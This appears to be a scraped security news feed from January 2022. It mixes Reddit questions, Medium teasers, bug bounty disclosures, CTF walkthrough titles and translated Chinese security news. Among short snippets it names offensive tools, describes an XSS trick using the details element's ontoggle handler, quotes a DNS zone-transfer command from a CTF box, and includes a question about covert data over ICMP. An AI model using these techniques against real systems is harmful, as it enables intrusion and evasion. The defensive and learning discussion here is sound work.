    Hi Everyone, I need some help finding compensation resources. Our security team has been having conflict over compensation with our HR compensation team. We want them to change the compensation band for a Mid-Level Security Analyst because the starting salary is $90k (105 Overall COL area). They tell us they want to start roles at 85% of the grade for the band which is around $70k-$80k. The role requires 5 years of IT exp with 2+ of Security. They claim they have done research but won't share their evidence stating the role is graded properly. It doesn't seem to align with what I have been seeing for other jobs, what people are asking for, or what I found on NIST NICE. What resources are out there to help identify compensation for roles in cyber by industry (i.e. e-commerce, higher ed, govt, etc). I want to bring something to them that says we are way below market and cannot be competitive but they seem to know otherwise. EDIT: I'm the hiring manager for the role submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    How anonymous is an Azure/AWS VM?
    I would like to mess with some scammers but would like to stay fairly anonymous. Am I correctly understanding that my identity is fairly safe when using a VM on Azure or AWS? I am aware MS/Amazon could still pass my identity to the government but I'm not worried about. My main concern is to stay hidden from the scammers. Thanks in advance for your reply. submitted by /u/LouTr0n [link] [comments]  ( 1 min )
    Python and C++ Hacking Projects
    What are good cybersecurity projects for someone who is a beginner-intermediate in hacking? submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    How does my university perform MITM monitoring on secure HTTPS connections?
    Hi AskNetsec, After suspicions towards my university's network provider (Eduroam), I have been digging into the extent to which they do, and/or are able to, monitor the activity of the students, while being on the network. Besides the rather normal DNS restrictions, of monitoring and blocking potentially harmful DNS requests, or in this case redirecting to a custom warning page, I have discovered something I would consider unusual. When accessing certain websites with a secure connection, HTTPS, the certificate for the website is tampered with. Meaning, that the certificate for a given website when requested through the university network, is not identical to the certificate returned when requesting from any other network. When digging deeper into the certificates, I found that custom …  ( 7 min )
  • Open

    How to find prospects for free?
    Want to build a prospecting list quickly and for free? Continue reading on Medium »  ( 4 min )
    Fun with Google Maps
    I recently posted a Tweet stating that one is able to search Google Maps by name, username, email, phone number, area code…in fact… Continue reading on Medium »  ( 1 min )
    Social Media OSINT
    Searching for accounts by username across social media applications. Continue reading on Medium »  ( 3 min )
    SpiderFoot (Automate OSINT for Threat Intelligences)
    About SpiderFoot Continue reading on Medium »  ( 1 min )
  • Open

    Bug Bounty: earn up to 100,000 PTP
    (at the time of writing, 100k PTP > $1M) Continue reading on Medium »  ( 1 min )
    Hacking with Subdomain3
    Subdomain3 is great tool that can be used to discover subdomains that belong to a website. The tool is written in Python3. Continue reading on Medium »  ( 1 min )
    Live Bug Bounty Training With My Strategy and Let’s hit easily Bounties Together in this year
    Hello Cybersecurity Researchers, Again I’m here after a lot of texts received on my LinkedIn and Instagram that when I launch my Live Bug… Continue reading on Medium »  ( 1 min )
    How I messed up my own profile data
    Just wanted to share one of my experience which I had while testing one of the web application. I will be brief so that I do not waste… Continue reading on Medium »  ( 2 min )
    Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports
    In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw. Continue reading on Medium »
    Extreme Hacking Mindset
    How to dominate in bug bounties Continue reading on Medium »
    How I found High-Priority PII leak through web archive
    Hello Hackers, Aditya here I am a cyber security student and bug bounty hunter. Continue reading on Medium »  ( 1 min )
  • Open

    CryptoLyzer: A comprehensive cryptographic settings analyzer (introduction with a comparison of cryptographic settings analyzers)
    submitted by /u/c0r0n3r [link] [comments]
    Privilege escalation in Acer Care Center by @last0x00 and @APTortellini
    submitted by /u/last0x00 [link] [comments]
    Introducing TREVORproxy and TREVORspray 2.0
    submitted by /u/aconite33 [link] [comments]
    Gorillas: Special offer - unicorn slices, 150g 🦍❤️
    submitted by /u/moviuro [link] [comments]
    Demonstrating how phishermen abuse free hosting
    submitted by /u/df_works [link] [comments]  ( 1 min )
    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    submitted by /u/HackingLZ [link] [comments]
  • Open

    Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members
    Operation Falcon II, championed by INTERPOL and The Nigeria Police Force, led to the arrest of a number of Nigerian business email compromise actors. The post Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members appeared first on Unit42.
  • Open

    SecWiki News 2022-01-19 Review
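    A method for tracking APT attack groups based on context-aware computing by ourren; 2021 Global DDoS Threat Report by ourren; Who Moved My DevOps: DevOps Risk Mapping by ourren. For more of the latest articles, visit SecWiki  ( 2 min )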
  • Open

    How Do You Know What "Bad" Looks Like?
    From the time I started in DFIR, one question was always on the forefront of incident responder's minds...how do you know what "bad" looks like? When I was heading on-site during those early engagements, that question was foremost on my mind, and very often, the reason I couldn't sleep on the plane, even on the long, cross country flights. As I gained experience, I started to have a sense of what "bad" might or could look like, and that question started coming from the folks around me (IT staff, etc.) while I was on-site. How do you know what "bad" looks like? The most obvious answer to the question is, clearly, "anything that's not "good"...". However, that doesn't really answer the question, does it? Back in the late '90s, I did a vulnerability assessment for an organization, and at one …  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

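    [Security Bulletin] Weblogic January update fixes multiple high-severity vulnerabilities
    Oracle recently released its January 2022 security update, covering 497 vulnerabilities across its products (Weblogic Server, Database Server, Java SE, MySQL, and others). The vulnerabilities fixed this time include...  ( 1 min )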
  • Open

    Discovering a security vulnerability in a major grocery delivery platform
    Article URL: https://zerforschung.org/posts/gorillas-en/ Comments URL: https://news.ycombinator.com/item?id=29991743 Points: 235 # Comments: 70  ( 8 min )
  • Open

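    Linux malware infections grew 35% in 2021
    According to statistics, the number of malware infections targeting Linux devices rose 35% during 2021.  ( 1 min )
    FreeBuf Morning Brief | US reviews Alibaba's cloud business; US Democrats introduce bill to ban online surveillance advertising
    Fashion giant Moncler confirmed that it suffered a data breach after the AlphV/BlackCat ransomware operation stole files in December, which were then published on the dark web.  ( 1 min )
    Fashion giant confirms ransomware attack, 11 million phones infected with a trojan | Global cybersecurity highlights for January 19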
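    Cybercrime case analysis: ticket-grabbing crawlers (No. 40)
    Developed a crawler to grab tickets and illegally profited 120,000 yuan, committing the crime of providing programs and tools for intruding into or illegally controlling computer information systems; sentenced to three years' imprisonment.  ( 1 min )
    APT Group Archive | Analysis of APT group activity trends in 2021
    This article is one of a series interpreting the highlights of the "APT Group Intelligence Research Yearbook"; it mainly introduces the crawler-framework-based and knowledge-graph natural language processing technology used by NSFOCUS in 2021, as mentioned in the yearbook.  ( 1 min )
    US Department of Commerce publishes the minimum elements for a Software Bill of Materials (SBOM)
    Defining the minimum elements of an SBOM is an iterative process. This report is a starting point, not the final word.  ( 1 min )
    Critical SAP vulnerability could lead to supply chain attacks
    CVE-2021-38178 has a CVSS score of 9.1, and its patch was released on SAP's October 2021 Patch Day. The vulnerability is described as an improper authorization issue that could allow an attacker to tamper with transport requests, thereby bypassing quality gates and transferring code artifacts to production systems.  ( 1 min )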

  • Open

    Is month of birth considered PII when combined with name (in California if that’s relevant?)
    I would like to add month of birth (without day/date/year) as criteria in a new active directory build, but cannot find a clear cut answer as to whether this is considered PII or not. Thank you in advance. submitted by /u/erpa2b [link] [comments]  ( 1 min )
    Is This Memory Diagram From Practical Malware Analysis Correct?
    I am reading through Practical Malware Analysis and I came across an image of a program's memory layout (Page 69). I have always understood that the stack started at a high memory address and grew towards a lower address, but the diagram in the book shows otherwise. Is there some aspect of this figure I am misinterpreting, or is there a reason why this specific image is different than the stack I am accustomed to? Image in the Book: https://i.imgur.com/vLtI3eC.png My Current Interpretation of Memory: https://i.imgur.com/Rt7H4Oj.png Thanks for the help! *Reposted from r/netsecstudents submitted by /u/pufftux [link] [comments]  ( 2 min )
    Taking notes while learning a course
    Hi everyone, I am currently working as a cyber security analyst with about 1.8 years of endpoint security experience and overall 6 years of cyber security experience. Would like your opinion on whether taking notes while you are learning a course like, say, Wireshark or Linux is necessary? If no, why? If yes, what is the best way to take notes on something like OneNote, as I feel it's difficult to take notes while watching a video. submitted by /u/aaronthecoolgnome [link] [comments]  ( 3 min )
    Client Certificate Authentication check
    In my company we need to implement Client Certificate Authentication in our web service. Certificates should be self signed and generated by the client. Then they send us the certificate without public key. My idea is that we store these certificates in the database. Now, I am not sure which field should I use to check authenticity of the certificate - thumbprint, subject, something else or multiple fields? I could also completely check public key in database against public key from incoming certificate. What are the recommendations for this scenario? submitted by /u/mandaric [link] [comments]  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? 3.) Why did "dig axfr xxxx.htb @10.10.10.xx " work? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Reso…  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Resources I've read so far (for those that stumble on this th…  ( 2 min )
    NIST compliant web application scanners
    What are some NIST compliant web app vulnerability scanners that you have come across? 50+ targets. submitted by /u/Dalgan [link] [comments]
    where can I view a full list of MDE detection and alerting rules?
    I've looked everywhere but it seems like this should be available. submitted by /u/slnt1996 [link] [comments]  ( 1 min )
    Can a server send an echo reply with different data?
    I know that's an unusual question, but I know I can send data to my server using ICMP packets (Hiding in the last 48 bytes of the packet, it could be more, but that could be suspicious), but can I receive data from the server? Looking at wireshark I realized the payload was the same in the reply submitted by /u/_JesusChrist_hentai [link] [comments]  ( 1 min )
    Trying to set up a isolated node on a lan network
    I have a secondary router off of my main network that I am trying to make as invisible to the rest of the network as I can. Off of that router I am trying to configure a raspberry pi 4b so it is as secure as I can make it. Potential threat vectors include individuals and small groups. submitted by /u/alonelyvoicespeaks [link] [comments]  ( 1 min )
  • Open

    BlueTeamLabs.Online
    Has anyone tried BlueTeamLabs.Online? I read there was a forensics pathway. Does anyone know if the forensics pathway is any good? Thanks! submitted by /u/DeadBirdRugby [link] [comments]  ( 1 min )
    Check Authenticity of Zip Creation Date
    Hello guys, I need help! Basically, a friend of mine mistakenly submitted the wrong assignment (zip file), later on he realized and emailed the teacher explaining the situation and attaching the right assignment (zip file) creation and modification date as a proof. The teacher says that anyone can revert the OS date and zip the file resulting in unauthentic creation date of zip file. My friend wants to find a method to prove to the teacher that the right assignment (zip file) was done on time and its creation date & modification date is authentic. My friend uses Windows 10 and is in desperate need of help. Any help will be deeply appreciated. submitted by /u/themidfinger007 [link] [comments]  ( 2 min )
    FORENSIC SOFTWARE RECOMMENDATION
    submitted by /u/tsipikau [link] [comments]  ( 1 min )
  • Open

    Zooming in on Zero-click Exploits (Project Zero)
    submitted by /u/albinowax [link] [comments]
    A Beginner’s guide into Router Hacking and Firmware Emulation
    submitted by /u/secnigma [link] [comments]
    Vulnerable AWS Lambda function - Initial access in cloud attacks
    submitted by /u/MiguelHzBz [link] [comments]
    Telenot Complex: Insecure AES Key Generation
    submitted by /u/0xdea [link] [comments]
    Dahua DVRs and Webcams bruteforcer at port 37777
    submitted by /u/falx1fer [link] [comments]
    Robust and blazing fast open-redirect vulnerability scanner with ability of recursively crawling all of web-forms, entry points, or links with data.
    submitted by /u/falx1fer [link] [comments]  ( 1 min )
    Mixed Messages: Busting Box’s MFA Methods | Varonis
    submitted by /u/VaronisThreatLabs [link] [comments]
    How to securely implement TLS certificate checking in Android apps
    submitted by /u/Masrepus [link] [comments]  ( 1 min )
    An attempt to understand container runtime
    submitted by /u/alt-glitch [link] [comments]  ( 1 min )
    Public exploit POC for critical windows http RCE impacting multiple windows versions
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
    Stealing administrative JWT's through post auth SSRF - VMWare Workspace One Access (CVE-2021-22056)
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Destructive malware targeting Ukrainian organizations
    submitted by /u/SCI_Rusher [link] [comments]
    How to Analyze Malicious Microsoft Office Files
    submitted by /u/dmchell [link] [comments]
  • Open

    CALISHOT 2022-01: Find ebooks among 373 Calibre sites this month
    Happy New Year, Folks! Here is the fresh new snapshot of the working calibre servers. Some minor improvements are coming with it: The sizes are now displayed. The links to the covers are also provided. It's useful as you may know that a book is unavailable in realtime if the cover is empty, without having to click on the book link. ANNOUNCEMENT: The calibre story started 2 years ago and during this long travel another sub more focused on this kind of content has been created for some various reasons. For this new year, I've decided to stop sharing the calishots in the current sub. If you're still interested in future dumps you can track them on the other one. Other resources will be proposed on it soon, like a wiki, tips, the datasets, original calibres, and some news about related tools like calisuck, calishot ... which are now turning into a single new project and will be released soon. Your contributions are also welcome on the sub. submitted by /u/krazybug [link] [comments]  ( 1 min )
    Help with scraping website with static .htm's (without sitemap)
    Hi Reddit, I've been trying to download this website (Cisco RV325 Emulator - Emulator) for full offline usage, and have used a variety of different tools with little success so far. I know it can be done because people have linked zip file downloads for other emulators in the cisco forums. I've tried wget, httrack, archivebox and several online website downloaders, however the problem I'm facing is as follows: If I download https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm I can load up the page locally but clicking on any of the menu items does nothing. It is just a static page which looks correct but isn't functional. I've tested winhttrack and wget settings of (-m -k) (-r -np -c) and another which uses (-l0) but I can't remember what the rest of the args were. From inspecting some of the urls using the online working version, I can see that each menu item has its own unique .htm page, which can be opened separately (online) if you just wanted to view that page and not be able to traverse to other pages (there is no menu bar). For example: Main Page - https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm Using the sidebar to go from Homepage > Port Management > Port setup, the online url is unchanged but clearly a separate static page for it exists because you can go to https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/lan_setting.htm and access the same thing (only that page's settings, not anything else) This means that if I downloaded this lan_setting.htm page and pointed to it in the local html, I should be able to access it right? The problem is that I don't know how to find all of these individual settings .htm page urls, and downloading them all manually and setting up local links in the main html file would take forever. I hope I've explained this well enough, please accept my apologies in advance if I haven't! submitted by /u/prymenumba [link] [comments]  ( 2 min )
    Worthy Bookmark: The Latest Google Dorks List - Jan 2022 DB Update
    submitted by /u/little_maggot [link] [comments]
  • Open

    Russian Roulette: Using Optical Character Recognition to investigate military equipment transfers
    What can we learn about Russian equipment transfers from a single Twitter video? Quite a lot, actually. Continue reading on Medium »  ( 3 min )
    Solution to the #IMINT #OSINT challenge
    This writeup is the solution to a challenge posed by Professor Gordon Farrer, for me a leading figure in this field and a person from whom… Continue reading on Medium »  ( 3 min )
  • Open

    How To Run Or Install Hakrawler Bug Bounty Tool on Kali Linux
    Hakrawler: Tool used to gather URLs and JavaScript file locations. Continue reading on Medium »  ( 1 min )
    Bug Bounty Program — Earn Up to 100,000 PTP
    Learn more about bug bounty program. Continue reading on Platypus.finance »  ( 1 min )
    My Bug Bounty Adventure -1-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Introducing the Exponent Bug Bounty Program in Collaboration with Immunefi
    Website | Litepaper | Twitter | Medium | Discord | Bug Bounty Program Continue reading on Medium »  ( 3 min )
    Bug Bounty Recon: Content Discovery (Efficiency pays $)
    Content Discovery — The process of finding vulnerable endpoints; URLs, Parameters and Resources. Continue reading on Medium »  ( 5 min )
    The New King “Broken Access Control”
    The King (Injection Bug) who was ruling the bug world for more than a decade is now conquered by the New King known as “Broken Access… Continue reading on Medium »  ( 1 min )
    Cross Site Port Attack in Wild
    Hello Hunter, Sorry for the delay of post and this is my first post in this year, I hope you’re all doing well and happy. So without… Continue reading on Medium »  ( 2 min )
  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )
  • Open

    SecWiki News 2022-01-18 Review
    A comprehensive analysis of the Israeli "Pegasus" spyware attack incidents by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Go: Getting Started with Fuzzing
    Article URL: https://go.dev/doc/tutorial/fuzz Comments URL: https://news.ycombinator.com/item?id=29980566 Points: 1 # Comments: 0  ( 11 min )
  • Open

    The Tale of a Click leading to RCE
    In today’s industry, we often hear that humans may weaken a company’s security leading to a potential breach. At ManoMano we highly… Continue reading on ManoMano Tech Team »  ( 11 min )
  • Open

    Top 5 Best Fuzzing & Vulnerability Research TIPS
    submitted by /u/pat_ventuzelo [link] [comments]
    Rust vs. C: How are vulnerabilities different? An analysis on the vulnerabilities in the two programming languages and what to look for.
    submitted by /u/ragnarsecurity [link] [comments]  ( 1 min )
  • Open

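    Cybercrime case analysis: the 12306 ticket-grabbing industry chain
    Bought and sold citizens' information and developed registration software, committing the crimes of infringing on citizens' personal information and providing programs for intruding into computer information systems; sentenced to three years' imprisonment, with illegal gains recovered.  ( 1 min )
    Interview with Xia Luning of 数字认证: cryptography + cloud, unlocking more security service models
    When traditional cryptographic technology meets the popular "cloud", cryptography will take on greater vitality and bring enterprises more advantages.  ( 1 min )
    Nintendo warns users to beware of Switch discounts on fake websites
    These websites use official logos to deceive Nintendo users and fans into believing they are official pages, and use steep discounts as bait to get them to buy Nintendo products that are very likely "fakes".
    2021 IoT device CVE ladder ranking
    As a company focused on IoT security, we have compiled some of the higher-scoring CVE IDs and their descriptions for the following brands.  ( 2 min )
    Researchers find high-severity vulnerability in three WordPress plugins
    WordPress security company Wordfence discovered a serious vulnerability that affects three different WordPress plugins and has impacted more than 84,000 websites.  ( 1 min )
    What is SASE (Secure Access Service Edge)? Concepts and use cases explained in one diagram
    The much-hyped SASE, explained in one diagram
    "网安知识大陆" (Cybersecurity Knowledge Continent) prize feedback drive | Let's find the flaws together
    Knowledge Continent is collecting feedback, with prizes!  ( 1 min )
    FreeBuf Morning Brief | Oracle fixes 483 vulnerabilities in January; Chrome restricts websites' direct access to private networks
    The January 2022 Oracle Critical Patch Update (CPU) states that the Oracle security update will address 483 new security patches; a Critical Patch Update is a collection of patches for multiple security vulnerabilities.  ( 1 min )
    Zero trust security market to reach $64.4 billion by 2027
    China, the world's second-largest economy, is expected to reach a market size of $11.1 billion by 2027.  ( 1 min )
    The top three malware families in Linux environments
    Linux systems are commonly deployed in IoT devices, and the most common abuse is using IoT devices for DDoS attacks. The top three malware families are XorDDoS, Mirai and Mozi.  ( 1 min )
    New Apple Safari browser vulnerability sounds the alarm on cross-site user tracking
    Anti-fraud software company FingerprintJS recently disclosed that a vulnerability in the IndexedDB API implementation in Safari 15 has been exploited by malicious websites.  ( 1 min )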
  • Open

    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    1.1      Intro I spent my early IT career working for a Cisco partner that specialized in Cisco phone systems. My work wasn’t directly with the phone systems, but it was usually in an adjacent field like route/switch and security. I did, however, get to see my share of networks that used Cisco phone systems. Today,... The post SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems appeared first on TrustedSec.  ( 5 min )
  • Open

    SSRF vulnerability in VMware authentication software could allow access to user
    Article URL: https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data Comments URL: https://news.ycombinator.com/item?id=29978942 Points: 3 # Comments: 0  ( 4 min )
  • Open

    XSS With Hoisting
    When dealing with JavaScript injection scenarios sometimes we might get into a difficult situation: the target page is not meant to be accessed directly and some of its code is supposed to use some other code in the setup intended. That leads to some broken script blocks and when the injection context is one of … Continue reading XSS With Hoisting The post XSS With Hoisting appeared first on Brute XSS.
  • Open

    IT Security in Web Applications I: Injections
    represent building blocks of many services. In particular, the strategic move of many companies to the cloud underscores the critical… Continue reading on Medium »  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    DOM XSS through ads
    Urban Dictionary disclosed a bug submitted by bemodtwz: https://hackerone.com/reports/889041

  • Open

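    In Chrome, XSS is now possible without the open attribute.
    Among XSS vectors, there is a method that uses the ontoggle event handler and the open attribute on the details tag. It works in Chrome, Safari, Firefox and IE, and it is used often because, among on*-based XSS, it reduces user interaction relatively easily. A new feature was added in the recent Chrome 97 update: Auto-expand details elements. Translated literally, it means that details elements are expanded automatically, which means a script can be executed immediately with ontoggle alone, even without using the open attribute.
    Hello Authz0, a new tool for Authorization testing 🚀
    I like to use ZAP's Zest Script for Authorization testing. In the past I often used an extension called Authz in Burpsuite. In any case, because these tools are built into ZAP and Burpsuite, they have the huge advantage of being able to use HTTP Raw Requests, but conversely, their overly detailed features and the mandatory use of Raw Requests tend to make simple tasks a little inconvenient. So, starting last weekend, I built a tool for Authorization testing, released it on Sunday afternoon, and would like to share it briefly. The tool I am introducing today is Authz0. What is Authz0 Authz0 is a tool that configures the URLs and Roles to test around a YAML-format Template file and can scan based on them.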
  • Open

    Is Google Authenticator impenetrable?
    Title is hyperbole obviously. Out of different 2FA methods, SMS was weak because you could get SIM swapped. Authy was weak because a hacker could switch it to their phone if they could get into your email. GA can't be moved from phone to phone so it can't be taken over by a hacker who gets access to your SIM card and email. My impression is that any account protected by GA is safe. Why is this wrong? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    What is "round tripping" in HTML/GO?
    ELI5 if you can. I'm learning so much from you guys! Thank you! submitted by /u/iExtrapolate314 [link] [comments]
    Newly created InfoSec role within IT department - what should I be doing to get it right?
    Hello AskNetSec! I'm not sure how else to word the title, so hopefully it's acceptable. Basically, I have been working in different facets of IT for 14 years. My current role is within IT operations as a systems engineer, but it's possibly evolving to be the first true role with an official information security component within the IT department at my company. I'm excited because I've always enjoyed the security aspects of my roles over my career, and my formal education was focused on information security. However, I recognize that I have no formal work experience in a security-specific role, and as such I feel like I'm "winging it". I don't really know what a formalized incident response looks like within an established security department. I don't know what tools I have at my disposal, or should have at my disposal, to do my job effectively. I also realize that I may be overthinking it. But truthfully, I have no point of reference. So I come to you all and ask for some opinions and insights to navigate as the sole person with these newly added responsibilities that I would liken to a security analyst, and do so in a way that makes sense and is effective. I'm happy to do my own reading and self-learning (I have access to PluralSight, if that would be useful), but also hoping maybe someone with experience can give some practical pointers and/or high-level procedural advice since I will likely be shaping this new role in coordination with my management. Thank you all in advance! Edited because my brain moved faster than my fingers could type :( submitted by /u/unseenspecter [link] [comments]  ( 5 min )
    How to create a rule that allows only one country with ModSecurity
    Hi all, Does anyone know how to write a rule for ModSecurity to only allow access to a website from one country? I'm currently using this rule: SecGeoLookupDb /usr/share/GeoIP/GeoIP.dat SecRule REMOTE_ADDR "@geoLookup" "chain,id:22,drop,msg:'Non-GB IP address'" SecRule GEO:COUNTRY_CODE "!@streq GB" Which is saved in the rules directory as: modsecurity_crs_15_customrules.conf And I have also changed the owner of /usr/share/GeoIP/GeoIP.dat to http for nginx. But the website is still getting traffic from outside of the UK. Any help and pointers would be greatly appreciated. submitted by /u/Rurisk89 [link] [comments]  ( 1 min )
    Small business honeypot recommendations?
    I started working internal IT for a small business late last year who had been ransomed twice. Their (soon to be) ex MSP still had RDP open to the world, so no wonder... Anyway, among the many other projects currently running I'm considering setting up some honeypots for additional protection. The business still has a number of accounts with weak passwords tied to their applications so it will be a while before they're sorted out. Is this something that would be worthwhile? And what tools have you used/would recommend? I'm looking for open source if/where possible. Thank you in advance :D submitted by /u/brettfk [link] [comments]  ( 1 min )
    Can HTTPS web traffic over a VPN be intercepted & decrypted if the router the PC is connected to is compromised? Can an attacker do this with tools available on a smartphone?
    submitted by /u/ferengiprophet [link] [comments]  ( 1 min )
    Can I ensure a pdf is clean by "printing to pdf" before sending?
    I want to email a pdf I downloaded from Library Genesis. It's an old scanned book I couldn't find anywhere else. I need to share it, but on the off chance there's anything malicious there, is there anything I can do to send a "cleaned" version? If I create a new pdf by printing to pdf, would that be safe? submitted by /u/sonsa_geistov [link] [comments]  ( 1 min )
    What is an XSS injection? How is it used? What vulnerabilities does it create?
    Also, someone elsewhere on the internet claimed that XSS can get around Cloudflare. How? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
  • Open

    Lots of movies and TV shows in the "disk" folders, download speed is decent
    submitted by /u/feelingsupersonic [link] [comments]  ( 1 min )
    Browser Extension for Saving Images As While Browsing
    Before you tell me to just shill for a VPS, run a crawler and some scripts; I would like to offer some insight. I like collecting old web GIFs and pixel art. These are typically from websites which are hardly active, or in some cases no longer online. Places other people would, usually, share on r/opendirectories. Ergo, whenever I pick these out it's already going to be a manual process. I suppose I can just right click + save as, a few hundred times, but I have found Pinterest's "Save Button" to also be convenient. It's an extension that scans the entire page quickly, and you can choose what to save through a convenient menu, and it even builds a gallery for me. I want to reshare these, so I don't consider it a violation of my privacy that they are being exposed under my account name. False Account Suspensions aren't unheard of, but it's been working for me so far. Except whenever I need to save any image smaller than 100x100 pixels. Pinterest has a restriction requiring all images to be above 100x100 in resolution, so in this case you have to Save As, pad out the background and then upload. Which is again, a level of tedium I would like to avoid. So, would any of you lovely folks happen to know any decent alternatives? submitted by /u/themadprogramer [link] [comments]  ( 3 min )
    The chiptune archive is back!
    Hey all, it's been a long time. I had my chiptune archive brought down because of the domain, and now it's back, under my own domain. The link is https://chiparchive.com/files. If you all want to talk to me on Twitter, it's https://twitter.com/thechiptunearc1 submitted by /u/jreina2002 [link] [comments]
  • Open

    Critical XSS in chrome extension
    Chrome extensions have a feature to inject content scripts containing JavaScript code in a web page. By using the standard Document Object… Continue reading on Medium »  ( 2 min )
    Bug Bounty Hunting
    You might wonder what this bug bounty hunting is. Is it hunting bugs or what? Well, certainly it's you hunting down bugs but not the ones we… Continue reading on Medium »  ( 2 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here. Continue reading on InfoSec Write-ups »  ( 3 min )
    IDOR leads to 2fa Bypass
    Hello everyone, my name is Arth Bajpai and I’m back with another writeup Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - SQL INJECTION LAB SOLUTIONS
    PortSwigger Web Security, made up of labs that contain web security vulnerabilities and cover the OWASP Top 10 vulnerabilities, is a web… Continue reading on Medium »  ( 15 min )
    Jobs in Cybersecurity
    Hello guys, are you excited to learn cybersecurity or ethical hacking? You are curious about how things work and have a thirst for learning… Continue reading on Medium »  ( 3 min )
    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    SSRF & Blind XSS in Gravatar email
    Automattic disclosed a bug submitted by rockybandana: https://hackerone.com/reports/1100096 - Bounty: $750
    Clickjacking
    Palo Alto Software disclosed a bug submitted by paramdham: https://hackerone.com/reports/688546
  • Open

    Registry Analysis - The "Why"
    Why is Registry analysis important? The Windows Registry, in part, controls a good bit of the functionality of a Windows system. As such, Registry analysis can help you understand why you're seeing something, or why you're not seeing something, as the case may be. For example, Registry "settings" (i.e., keys, values, or combinations) can be/have been used to disable Windows Event Logs, enable or disable auditing (the content that goes into the Windows Event Log), disable access to security tools, enable or disable other functionality on Windows systems, etc. The Registry can be used to enable or disable application prefetching, which produces artifacts very commonly used by forensic analysts and incident responders. Most analysts are aware that, particularly with respect to the file sy…  ( 7 min )
  • Open

    Analyzing Binaries with Radare2
    submitted by /u/DLLCoolJ [link] [comments]
    Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
    zimawhit3/HellsGateNim: A quick example of the Hells Gate technique in Nim
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: InternetDB API – Fast IP Lookups for Port and Vulnerability Information
    Article URL: https://internetdb.shodan.io Comments URL: https://news.ycombinator.com/item?id=29970480 Points: 2 # Comments: 0
    Same-origin violation vulnerability in Safari 15 could leak a user’s website
